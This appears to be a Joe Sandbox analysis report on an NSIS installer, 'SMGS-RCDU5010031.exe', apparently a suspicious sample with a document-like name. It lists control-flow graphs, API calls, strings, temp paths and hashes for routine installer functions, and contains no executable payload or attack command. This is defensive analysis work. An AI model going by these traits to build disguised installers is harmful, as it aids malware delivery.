                                                                                                                                                                                                          control_flow_graph 255 403c3c-403c4e 256 403c54-403c5a 255->256 257 403d8f-403d9e 255->257 256->257 258 403c60-403c69 256->258 259 403da0-403de8 GetDlgItem * 2 call 404114 SetClassLongW call 40140b 257->259 260 403ded-403e02 257->260 263 403c6b-403c78 SetWindowPos 258->263 264 403c7e-403c81 258->264 259->260 261 403e42-403e47 call 404160 260->261 262 403e04-403e07 260->262 274 403e4c-403e67 261->274 266 403e09-403e14 call 401389 262->266 267 403e3a-403e3c 262->267 263->264 269 403c83-403c95 ShowWindow 264->269 270 403c9b-403ca1 264->270 266->267 288 403e16-403e35 SendMessageW 266->288 267->261 273 4040e1 267->273 269->270 275 403ca3-403cb8 DestroyWindow 270->275 276 403cbd-403cc0 270->276 281 4040e3-4040ea 273->281 279 403e70-403e76 274->279 280 403e69-403e6b call 40140b 274->280 282 4040be-4040c4 275->282 284 403cc2-403cce SetWindowLongW 276->284 285 403cd3-403cd9 276->285 291 403e7c-403e87 279->291 292 40409f-4040b8 DestroyWindow EndDialog 279->292 280->279 282->273 289 4040c6-4040cc 282->289 284->281 286 403d7c-403d8a call 40417b 285->286 287 403cdf-403cf0 GetDlgItem 285->287 286->281 293 403cf2-403d09 SendMessageW IsWindowEnabled 287->293 294 403d0f-403d12 287->294 288->281 289->273 296 4040ce-4040d7 ShowWindow 289->296 291->292 297 403e8d-403eda call 406072 call 404114 * 3 GetDlgItem 291->297 292->282 293->273 293->294 298 403d14-403d15 294->298 299 403d17-403d1a 294->299 296->273 325 403ee4-403f20 ShowWindow KiUserCallbackDispatcher call 404136 EnableWindow 297->325 326 403edc-403ee1 297->326 302 403d45-403d4a call 4040ed 298->302 303 403d28-403d2d 299->303 304 403d1c-403d22 299->304 302->286 307 403d63-403d76 SendMessageW 303->307 309 403d2f-403d35 303->309 304->307 308 403d24-403d26 304->308 307->286 308->302 313 403d37-403d3d call 40140b 309->313 314 403d4c-403d55 call 40140b 309->314 323 403d43 313->323 314->286 322 403d57-403d61 314->322 322->323 323->302 329 403f22-403f23 325->329 330 403f25 325->330 326->325 331 403f27-403f55 GetSystemMenu EnableMenuItem SendMessageW 329->331 330->331 332 403f57-403f68 SendMessageW 331->332 333 403f6a 331->333 334 403f70-403fae call 404149 call 406050 lstrlenW call 406072 SetWindowTextW call 401389 332->334 333->334 334->274 343 403fb4-403fb6 334->343 343->274 344 403fbc-403fc0 343->344 345 403fc2-403fc8 344->345 346 403fdf-403ff3 DestroyWindow 344->346 345->273 347 403fce-403fd4 345->347 346->282 348 403ff9-404026 CreateDialogParamW 346->348 347->274 349 403fda 347->349 348->282 350 40402c-404083 call 404114 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 348->350 349->273 350->273 355 404085-40409d ShowWindow call 404160 350->355 355->282
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C78
                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403C95
                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403CA9
                                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CC5
                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403CE6
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFA
                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D01
                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403DAF
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403DB9
                                                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD3
                                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403E24
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403ECA
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403EEB
                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EFD
                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F2E
                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403F35
                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F4D
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F60
                                                                                                                                                                                                          • lstrlenW.KERNEL32(0042D248,?,0042D248,Snubbendes Setup), ref: 00403F89
                                                                                                                                                                                                          • SetWindowTextW.USER32(?,0042D248), ref: 00403F9D
                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004040D1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                          • String ID: Snubbendes Setup
                                                                                                                                                                                                          • API String ID: 3282139019-3918928792
                                                                                                                                                                                                          • Opcode ID: 1e8f8ab3894185fee3e819c4da667bb3c8cf9c8625066028452a86f04d68d7ae
                                                                                                                                                                                                          • Instruction ID: 977002fee4e807fcea2a4689fe207fdbad8331f3a024ab3ce592dbd86d7f0908
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e8f8ab3894185fee3e819c4da667bb3c8cf9c8625066028452a86f04d68d7ae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EC1D171504204BFDB216F61EE89E2B3A69FB88706F04053EF641B21F0CB799991DB6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403899 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 358 403899-4038b1 call 40642a 361 4038b3-4038c3 call 405f97 358->361 362 4038c5-4038fc call 405f1d 358->362 371 40391f-403948 call 403b6f call 405b0c 361->371 367 403914-40391a lstrcatW 362->367 368 4038fe-40390f call 405f1d 362->368 367->371 368->367 376 4039da-4039e2 call 405b0c 371->376 377 40394e-403953 371->377 383 4039f0-403a15 LoadImageW 376->383 384 4039e4-4039eb call 406072 376->384 377->376 378 403959-403973 call 405f1d 377->378 382 403978-403981 378->382 382->376 385 403983-403987 382->385 387 403a96-403a9e call 40140b 383->387 388 403a17-403a47 RegisterClassW 383->388 384->383 389 403999-4039a5 lstrlenW 385->389 390 403989-403996 call 405a31 385->390 399 403aa0-403aa3 387->399 400 403aa8-403ab3 call 403b6f 387->400 391 403b65 388->391 392 403a4d-403a91 SystemParametersInfoW CreateWindowExW 388->392 397 4039a7-4039b5 lstrcmpiW 389->397 398 4039cd-4039d5 call 405a04 call 406050 389->398 390->389 396 403b67-403b6e 391->396 392->387 397->398 403 4039b7-4039c1 GetFileAttributesW 397->403 398->376 399->396 411 403ab9-403ad3 ShowWindow call 4063ba 400->411 412 403b3c-403b44 call 405282 400->412 406 4039c3-4039c5 403->406 407 4039c7-4039c8 call 405a50 403->407 406->398 406->407 407->398 419 403ad5-403ada call 4063ba 411->419 420 403adf-403af1 GetClassInfoW 411->420 417 403b46-403b4c 412->417 418 403b5e-403b60 call 40140b 412->418 417->399 421 403b52-403b59 call 40140b 417->421 418->391 419->420 424 403af3-403b03 GetClassInfoW RegisterClassW 420->424 425 403b09-403b2c DialogBoxParamW call 40140b 420->425 421->399 424->425 429 403b31-403b3a call 4037e9 425->429 429->396
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                                                                                                                            • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                                                                                                                          • lstrcatW.KERNEL32(1033,0042D248), ref: 0040391A
                                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,75BA3420), ref: 0040399A
                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 004039AD
                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 004039B8
                                                                                                                                                                                                          • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114), ref: 00403A01
                                                                                                                                                                                                            • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
                                                                                                                                                                                                          • RegisterClassW.USER32(00433E80), ref: 00403A3E
                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A56
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A8B
                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403AC1
                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403AED
                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403AFA
                                                                                                                                                                                                          • RegisterClassW.USER32(00433E80), ref: 00403B03
                                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403C3C,00000000), ref: 00403B22
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                          • API String ID: 1975747703-917014046
                                                                                                                                                                                                          • Opcode ID: 42654ec177014d1f03b4ff0d2635b06bf077c7dc75d3c24c479e90fc5b65b2ec
                                                                                                                                                                                                          • Instruction ID: d3915a60f35156ec108069fee93d058ae2b4a83f87b830a45993cae0616e5fa0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42654ec177014d1f03b4ff0d2635b06bf077c7dc75d3c24c479e90fc5b65b2ec
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF61AA71640700AFD310AF659D46F2B3A6CEB84B4AF40113FF941B51E2DB7D6941CA2D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402DEE Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 432 402dee-402e3c GetTickCount GetModuleFileNameW call 405c25 435 402e48-402e76 call 406050 call 405a50 call 406050 GetFileSize 432->435 436 402e3e-402e43 432->436 444 402f63-402f71 call 402d8a 435->444 445 402e7c 435->445 437 403020-403024 436->437 451 402f73-402f76 444->451 452 402fc6-402fcb 444->452 446 402e81-402e98 445->446 449 402e9a 446->449 450 402e9c-402ea5 call 403242 446->450 449->450 458 402eab-402eb2 450->458 459 402fcd-402fd5 call 402d8a 450->459 454 402f78-402f90 call 403258 call 403242 451->454 455 402f9a-402fc4 GlobalAlloc call 403258 call 403027 451->455 452->437 454->452 478 402f92-402f98 454->478 455->452 483 402fd7-402fe8 455->483 462 402eb4-402ec8 call 405be0 458->462 463 402f2e-402f32 458->463 459->452 469 402f3c-402f42 462->469 481 402eca-402ed1 462->481 468 402f34-402f3b call 402d8a 463->468 463->469 468->469 474 402f51-402f5b 469->474 475 402f44-402f4e call 4064db 469->475 474->446 482 402f61 474->482 475->474 478->452 478->455 481->469 487 402ed3-402eda 481->487 482->444 484 402ff0-402ff5 483->484 485 402fea 483->485 488 402ff6-402ffc 484->488 485->484 487->469 489 402edc-402ee3 487->489 488->488 490 402ffe-403019 SetFilePointer call 405be0 488->490 489->469 491 402ee5-402eec 489->491 495 40301e 490->495 491->469 493 402eee-402f0e 491->493 493->452 494 402f14-402f18 493->494 496 402f20-402f28 494->496 497 402f1a-402f1e 494->497 495->437 496->469 498 402f2a-402f2c 496->498 497->482 497->496 498->469
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,00000400,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00402E1B
                                                                                                                                                                                                            • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C29
                                                                                                                                                                                                            • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C4B
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00402E67
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SMGS-RCDU5010031.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                          • API String ID: 4283519449-2280241162
                                                                                                                                                                                                          • Opcode ID: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                                                                                                                                          • Instruction ID: ecf8b1e823d6f98de7c15f593086dd5554d056807b59ad61161c89ef3c81dadd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF51F671900216ABDB109F61DE89B9F7BB8FB54394F21413BF904B62C1C7B89D409B6C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes,?,?,00000031), ref: 004017CD
                                                                                                                                                                                                            • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Snubbendes Setup,NSIS Error), ref: 0040605D
                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrcatW.KERNEL32(0042C228,0040318B), ref: 0040520A
                                                                                                                                                                                                            • Part of subcall function 004051AF: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040521C
                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes$C:\Users\user\AppData\Local\Temp\nsi19C1.tmp$C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll$Call
                                                                                                                                                                                                          • API String ID: 1941528284-2535037376
                                                                                                                                                                                                          • Opcode ID: 1c292b98166a31c9089d75ffbac55774b0fa1de423b16314c0e4ed2c7239b5d3
                                                                                                                                                                                                          • Instruction ID: fa226e2697354f8a36450ecb7523776f7f82d9f29d3b914395726c71c929f9d2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c292b98166a31c9089d75ffbac55774b0fa1de423b16314c0e4ed2c7239b5d3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37418471900514BADF11BBB5CC46EAF7679EF45328F20823BF522B10E1DB3C8A519A6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403027 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 691 403027-40303e 692 403040 691->692 693 403047-403050 691->693 692->693 694 403052 693->694 695 403059-40305e 693->695 694->695 696 403060-403069 call 403258 695->696 697 40306e-40307b call 403242 695->697 696->697 701 403230 697->701 702 403081-403085 697->702 703 403232-403233 701->703 704 4031db-4031dd 702->704 705 40308b-4030d4 GetTickCount 702->705 706 40323b-40323f 703->706 709 40321d-403220 704->709 710 4031df-4031e2 704->710 707 403238 705->707 708 4030da-4030e2 705->708 707->706 711 4030e4 708->711 712 4030e7-4030f5 call 403242 708->712 713 403222 709->713 714 403225-40322e call 403242 709->714 710->707 715 4031e4 710->715 711->712 712->701 724 4030fb-403104 712->724 713->714 714->701 725 403235 714->725 716 4031e7-4031ed 715->716 719 4031f1-4031ff call 403242 716->719 720 4031ef 716->720 719->701 728 403201-40320d call 405cd7 719->728 720->719 727 40310a-40312a call 406549 724->727 725->707 733 403130-403143 GetTickCount 727->733 734 4031d3-4031d5 727->734 735 4031d7-4031d9 728->735 736 40320f-403219 728->736 737 403145-40314d 733->737 738 40318e-403190 733->738 734->703 735->703 736->716 741 40321b 736->741 742 403155-40318b MulDiv wsprintfW call 4051af 737->742 743 40314f-403153 737->743 739 403192-403196 738->739 740 4031c7-4031cb 738->740 744 403198-40319f call 405cd7 739->744 745 4031ad-4031b8 739->745 740->708 746 4031d1 740->746 741->707 742->738 743->738 743->742 751 4031a4-4031a6 744->751 749 4031bb-4031bf 745->749 746->707 749->727 752 4031c5 749->752 751->735 753 4031a8-4031ab 751->753 752->707 753->749
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                                          • String ID: ... %d%%$@
                                                                                                                                                                                                          • API String ID: 551687249-3859443358
                                                                                                                                                                                                          • Opcode ID: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                                                                                                                                          • Instruction ID: a151fef9e86e41fc3429002d146a23742bf049d8b35666da4da471479faf367b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9517C71901219EBDB10CF65DA44BAE3BA8AF05766F10417BF815B72C0C7789A41CBAA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
